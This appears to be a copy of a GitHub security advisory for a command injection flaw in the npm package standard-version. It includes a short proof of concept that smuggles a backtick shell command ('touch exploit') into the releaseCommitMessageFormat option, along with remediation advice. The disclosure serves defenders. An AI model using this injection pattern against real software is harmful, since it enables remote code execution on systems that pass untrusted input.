logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

GHSA-7xcx-6wjh-7xp2 standard-version

Package

Manager: npm
Name: standard-version
Vulnerable Version: >=0 <8.0.1

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H/RL:U/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Command Injection in standard-version # GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-111` The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [standard-version](https://github.com/conventional-changelog/standard-version). ## Summary The `standardVersion` function has a command injection vulnerability. Clients of the `standard-version` library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. ## Product Standard Version ## Tested Version Commit [2f04ac8](https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9/) ## Details ### Issue 1: Command injection in `standardVersion` The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in: ``` npm install standard-version git init echo "foo" > foo.txt # the git repo has to be non-empty git add foo.txt git commit -am "initial commit" ``` Now create a file with the following contents: ``` var fs = require("fs"); // setting up a bit of environment fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}'); const standardVersion = require('standard-version') standardVersion({ noVerify: true, infile: 'foo.txt', releaseCommitMessageFormat: "bla `touch exploit`" }) ``` and run it: ``` node test.js ``` Notice that a file named `exploit` has been created. This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples: [CVE-2020-7646](https://github.com/advisories/GHSA-m8xj-5v73-3hh8), [CVE-2020-7614](https://github.com/advisories/GHSA-426h-24vj-qwxf), [CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh), [CVE-2019-10778](https://github.com/advisories/GHSA-4gp3-p7ph-x2jr), [CVE-2019-10776](https://github.com/advisories/GHSA-84cm-v6jp-gjmr), [CVE-2018-16462](https://github.com/advisories/GHSA-9jm3-5835-537m), [CVE-2018-16461](https://github.com/advisories/GHSA-7g2w-6r25-2j7p), [CVE-2018-16460](https://github.com/advisories/GHSA-cfhg-9x44-78h2), [CVE-2018-13797](https://github.com/advisories/GHSA-pp57-mqmh-44h7), [CVE-2018-3786](https://github.com/advisories/GHSA-c9j3-wqph-5xx9), [CVE-2018-3772](https://github.com/advisories/GHSA-wjr4-2jgw-hmv8), [CVE-2018-3746](https://github.com/advisories/GHSA-3pxp-6963-46r9), [CVE-2017-16100](https://github.com/advisories/GHSA-jcw8-r9xm-32c6), [CVE-2017-16042](https://github.com/advisories/GHSA-qh2h-chj9-jffq). We have written a [CodeQL](https://codeql.com) query, which automatically detects this vulnerability. You can see the results of the query on the `standard-version` project [here](https://lgtm.com/query/237522640229151035/). #### Impact This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. #### Remediation We recommend not using an API that can interpret a string as a shell command. For example, use [`child_process.execFile`](https://nodejs.org/api/child_process.html#child_process_child_process_execfile_file_args_options_callback) instead of [`child_process.exec`](https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback). ## Credit This issue was discovered and reported by GitHub Engineer [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh). ## Contact You can contact the GHSL team at `securitylab@github.com`, please include `GHSL-2020-111` in any communication regarding this issue. ## Disclosure Policy This report is subject to our [coordinated disclosure policy](https://securitylab.github.com/disclosures#policy).

Metadata

Created: 2020-07-13T21:34:59Z
Modified: 2021-09-22T21:03:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-7xcx-6wjh-7xp2/GHSA-7xcx-6wjh-7xp2.json
CWE IDs: ["CWE-77"]
Alternative ID: N/A
Finding: F422
Auto approve: 1